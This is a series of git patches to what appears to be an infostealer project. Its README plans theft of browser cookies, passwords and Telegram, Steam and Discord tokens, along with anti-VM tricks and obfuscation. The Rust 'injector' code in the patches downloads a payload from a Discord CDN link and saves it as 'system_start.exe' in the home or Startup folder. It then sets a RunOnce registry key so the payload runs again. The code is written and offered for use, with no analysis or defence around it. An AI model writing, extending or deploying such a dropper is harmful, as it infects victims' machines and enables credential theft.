From 907babc3d48754d98db0786a76e859bb71ba4acb Mon Sep 17 00:00:00 2001 From: User <user@debian-BULLSEYE-live-builder-AMD64> Date: Mon, 15 May 2023 13:26:30 +0200 Subject: [PATCH 1/4] Inspirations --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 0a49126..208f5e6 100644 --- a/README.md +++ b/README.md @@ -26,3 +26,9 @@ Additional: - anti-VM, anti-debug - packing - obfuscation + +## Inspirations + +https://github.com/Abdulrhmanbk/discoon-malware/ + +https://github.com/doenerium69/doenerium -- GitLab From 2bb928d95d3015ba87248b9d29c7e3174261f993 Mon Sep 17 00:00:00 2001 From: User <user@debian-BULLSEYE-live-builder-AMD64> Date: Wed, 17 May 2023 14:31:26 +0200 Subject: [PATCH 2/4] Injector can download to home dir --- injector/Cargo.toml | 1 + injector/src/main.rs | 23 ++++++++++++++++++----- 2 files changed, 19 insertions(+), 5 deletions(-) diff --git a/injector/Cargo.toml b/injector/Cargo.toml index 8e92751..a06d1e5 100644 --- a/injector/Cargo.toml +++ b/injector/Cargo.toml @@ -8,3 +8,4 @@ edition = "2021" [dependencies] reqwest = "*" tokio = { version = "1", features = ["full"] } +directories = "5.0.1" diff --git a/injector/src/main.rs b/injector/src/main.rs index 63a2560..af69aed 100644 --- a/injector/src/main.rs +++ b/injector/src/main.rs @@ -1,4 +1,5 @@ use std::{io::Cursor, env::var_os}; +use directories::UserDirs; type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>; async fn fetch_url(url: String, file_name: String) -> Result<()> { @@ -11,9 +12,21 @@ async fn fetch_url(url: String, file_name: String) -> Result<()> { #[tokio::main] async fn main() { - let test = var_os("APPDATA").unwrap(); - let appdata = test.to_str().unwrap(); - let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe"; - let startup = format!("{}{}", appdata, right_path); - fetch_url("URL HERE".to_string(), startup.to_string()).await.unwrap(); + + if true { + let user_dirs = UserDirs::new().unwrap() ; + let homedir = user_dirs.home_dir().to_str().unwrap(); + let path = format!("{}{}", homedir, "\\system_start.exe"); + + fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap(); + + }else{ + let test = var_os("APPDATA").unwrap(); + let appdata = test.to_str().unwrap(); + let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe"; + let path = format!("{}{}", appdata, right_path); + + fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap(); + + } } -- GitLab From a76eb38f72c29f4d4f290044f8d1d456ad7744cd Mon Sep 17 00:00:00 2001 From: User <user@debian-BULLSEYE-live-builder-AMD64> Date: Thu, 18 May 2023 22:09:39 +0200 Subject: [PATCH 3/4] Injector adds payload path to registry --- injector/Cargo.toml | 1 + injector/src/main.rs | 11 +++++++++++ 2 files changed, 12 insertions(+) diff --git a/injector/Cargo.toml b/injector/Cargo.toml index a06d1e5..0f246f9 100644 --- a/injector/Cargo.toml +++ b/injector/Cargo.toml @@ -9,3 +9,4 @@ edition = "2021" reqwest = "*" tokio = { version = "1", features = ["full"] } directories = "5.0.1" +winreg = "0.50.0" diff --git a/injector/src/main.rs b/injector/src/main.rs index af69aed..1e446d4 100644 --- a/injector/src/main.rs +++ b/injector/src/main.rs @@ -1,5 +1,8 @@ use std::{io::Cursor, env::var_os}; use directories::UserDirs; +use std::path::Path; +use winreg::enums::*; +use winreg::RegKey; type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>; async fn fetch_url(url: String, file_name: String) -> Result<()> { @@ -20,6 +23,14 @@ async fn main() { fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap(); + let hkcu = RegKey::predef(HKEY_CURRENT_USER); + let reg_path = Path::new("Software") + .join("Microsoft") + .join("Windows") + .join("CurrentVersion") + .join("RunOnce"); + let (key, _) = hkcu.create_subkey(®_path).unwrap(); + key.set_value("System start", &path).unwrap(); }else{ let test = var_os("APPDATA").unwrap(); let appdata = test.to_str().unwrap(); -- GitLab From adf3926b28bac3d4c2391af70dbcebd72fcde2fd Mon Sep 17 00:00:00 2001 From: User <user@debian-BULLSEYE-live-builder-AMD64> Date: Thu, 18 May 2023 22:18:46 +0200 Subject: [PATCH 4/4] Payload url in injector's download function --- README.md | 2 +- injector/src/main.rs | 7 ++++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 208f5e6..4e094ba 100644 --- a/README.md +++ b/README.md @@ -22,7 +22,7 @@ Additional: - browser cookies - browser passwords - telegram, steam, discord tokens -- persistence via regkey +- persistence via regkey ✅ - anti-VM, anti-debug - packing - obfuscation diff --git a/injector/src/main.rs b/injector/src/main.rs index 1e446d4..90756cc 100644 --- a/injector/src/main.rs +++ b/injector/src/main.rs @@ -5,7 +5,8 @@ use winreg::enums::*; use winreg::RegKey; type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>; -async fn fetch_url(url: String, file_name: String) -> Result<()> { +async fn download_payload(file_name: String) -> Result<()> { + let url = "https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(); let response = reqwest::get(url).await?; let mut file = std::fs::File::create(file_name)?; let mut content = Cursor::new(response.bytes().await?); @@ -21,7 +22,7 @@ async fn main() { let homedir = user_dirs.home_dir().to_str().unwrap(); let path = format!("{}{}", homedir, "\\system_start.exe"); - fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap(); + download_payload(path.to_string()).await.unwrap(); let hkcu = RegKey::predef(HKEY_CURRENT_USER); let reg_path = Path::new("Software") @@ -37,7 +38,7 @@ async fn main() { let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe"; let path = format!("{}{}", appdata, right_path); - fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap(); + download_payload(path.to_string()).await.unwrap(); } } -- GitLab